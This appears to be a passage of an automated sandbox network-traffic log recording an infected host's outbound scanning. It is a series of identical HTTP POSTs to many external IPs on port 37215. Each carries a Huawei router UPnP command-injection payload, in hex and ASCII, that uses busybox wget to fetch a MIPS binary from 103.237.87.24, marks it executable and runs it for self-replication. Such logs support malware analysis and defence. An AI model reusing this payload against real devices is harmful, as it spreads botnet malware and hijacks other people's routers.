3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2319192.168.2.1335334104.19.95.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622975111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2320192.168.2.135450841.225.162.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622999907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2321192.168.2.135835282.107.31.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623018026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2322192.168.2.135932260.191.112.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623106003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2323192.168.2.135478041.100.104.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623106956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2324192.168.2.1354890152.208.59.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623217106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2325192.168.2.1357602157.41.19.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623218060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2326192.168.2.1359296197.187.184.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623317003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2327192.168.2.134944041.172.133.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623317003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2328192.168.2.1333426197.155.180.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623334885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2329192.168.2.1350176157.5.102.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623352051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
